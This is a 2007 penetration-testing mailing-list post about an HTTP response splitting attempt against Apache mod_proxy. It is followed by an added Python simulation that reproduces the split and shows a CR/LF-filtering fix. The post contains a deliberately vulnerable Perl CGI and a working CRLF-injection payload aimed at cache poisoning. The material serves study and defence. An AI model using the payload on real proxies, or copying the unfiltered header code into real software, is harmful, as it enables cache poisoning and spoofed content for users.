Penetration Testing mailing list archives
Http splitting working example
From: "Gleb Paharenko" <gpaharenko () gmail com>
Date: Thu, 29 Nov 2007 17:53:02 +0200
Hi list. I hope somebody will spend some time on my question :), or point me to the right list.

Does HTTP splitting still work in fresh versions of common applications (Squid, Apache)? I've written a sample application (a CGI script) vulnerable to it; however, Apache mod_proxy just ignores the answer and initiates a new connection for each request.

Chain: Client (netcat) -> Apache (mod_proxy) -> Apache -> vulnerable CGI. The proxy is on localhost.
Goal: poison mod_proxy's cache.

The CGI is:

    #!/usr/bin/perl
    use CGI qw(:standard);
    print "Status: 302 Moved\nLocation: ".param('name')."\n\n";

The attempt to exploit it is:

    # nc localhost 80
    GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html> HTTP/1.1
    Host: test.xxx

    HTTP/1.1 302 Moved
    Date: Thu, xx Nov 2007 xx:25:03 GMT
    Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
    Location: Foo
    Content-Length: 0
    Content-Type: text/plain
    Via: 1.1 client.xxx (Apache/2.xx)

    GET http://test.xxx/1.html HTTP/1.1
    Host: test.xxx

    HTTP/1.1 200 OK
    Date: Thu, xx Nov 2007 15:25:09 GMT
    Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
    Last-Modified: Thu, xx Nov 2007 xxx GMT
    ETag: "2c8be-2-c4f7b640"
    Accept-Ranges: bytes
    Content-Length: 2
    Content-Type: text/html

    1

However, as I've found, mod_proxy initiates a new connection for the second GET. That breaks the whole idea of exploiting HTTP splitting. Is it some kind of new protection feature in Apache mod_cache?

Could anybody please provide a brief description of common applications on which the attack works? It seems vendors have done a great job (like filtering characters in PHP's header(), or in Tomcat).

--
Best regards.
Gleb Pakharenko.
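Editor's added example (not part of Gleb's post or of any reply in this thread): a self-contained simulation of the splitting the post describes. vulnerable_response() mimics the posted CGI, which copies the name parameter into the Location header unfiltered; safe_response() is the hardened form that rejects CR/LF, which is what the PHP and Tomcat filtering Gleb mentions amounts to; split_responses() reads a single connection's byte stream the way a naive keep-alive client or proxy would; and poisoned_cache() shows why the attack only works when both requests are answered over one backend connection, which is exactly what mod_proxy refused to do in the post. The payload is the post's name value re-encoded so that every line break is %0d%0a (the original contains a bare %0a%0a before the second Content-Length); the request paths and the in-order response pairing are assumptions for illustration, not mod_proxy's actual behaviour.

```python
# Added example: simulate HTTP response splitting against the posted CGI.
# Not the original poster's code; payload and request paths are constructed.
from urllib.parse import unquote

# Constructed payload: the post's 'name' value with every line break as CRLF.
PAYLOAD = unquote(
    "Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>"
)


def vulnerable_response(name: str) -> bytes:
    """What the server emits for the posted CGI once 'Status: 302 Moved' has
    become a status line: 'name' lands in Location verbatim, CR/LF included."""
    return b"HTTP/1.1 302 Moved\r\nLocation: " + name.encode("latin-1") + b"\r\n\r\n"


def is_safe_header_value(value: str) -> bool:
    """A header value may not contain CR or LF; that is the whole fix."""
    return "\r" not in value and "\n" not in value


def safe_response(name: str) -> bytes:
    """Hardened variant of vulnerable_response(): refuse CR/LF in the value."""
    if not is_safe_header_value(name):
        raise ValueError("CR/LF in header value")
    return b"HTTP/1.1 302 Moved\r\nLocation: " + name.encode("latin-1") + b"\r\n\r\n"


def split_responses(stream: bytes) -> list:
    """Parse back-to-back responses off one connection as a keep-alive reader
    does: header block up to CRLFCRLF, then Content-Length body bytes.
    Returns a list of (status_line, headers_dict, body)."""
    responses = []
    pos = 0
    while True:
        while stream.startswith(b"\r\n", pos):  # tolerate blank lines between responses
            pos += 2
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = end + 4
        responses.append((lines[0], headers, stream[body_start:body_start + length]))
        pos = body_start + length
    return responses


def poisoned_cache(request_paths: list, stream: bytes) -> dict:
    """Assumed proxy behaviour: N requests pipelined over ONE backend
    connection, Nth response paired with Nth request. The attacker's injected
    second response is then cached under the victim URL. A proxy that opens a
    fresh connection per request (as mod_proxy did in the post) never pairs
    the two, and the injected response is simply discarded."""
    responses = split_responses(stream)
    return {path: body for path, (_, _, body) in zip(request_paths, responses)}


if __name__ == "__main__":
    stream = vulnerable_response(PAYLOAD)
    for status, headers, body in split_responses(stream):
        print(status, headers, body)
    # Constructed request paths: the attacker's CGI request, then the victim URL.
    print(poisoned_cache(["/cgi-bin/1.pl?name=...", "/1.html"], stream))
```

Run it as a script to see the single 302 from the CGI come apart into two responses, the second of which is the attacker's 200 with the Gotcha body attributed to /1.html. Feeding safe_response() output through the same parser yields exactly one response, because the CR/LF that the attack depends on never reaches the wire.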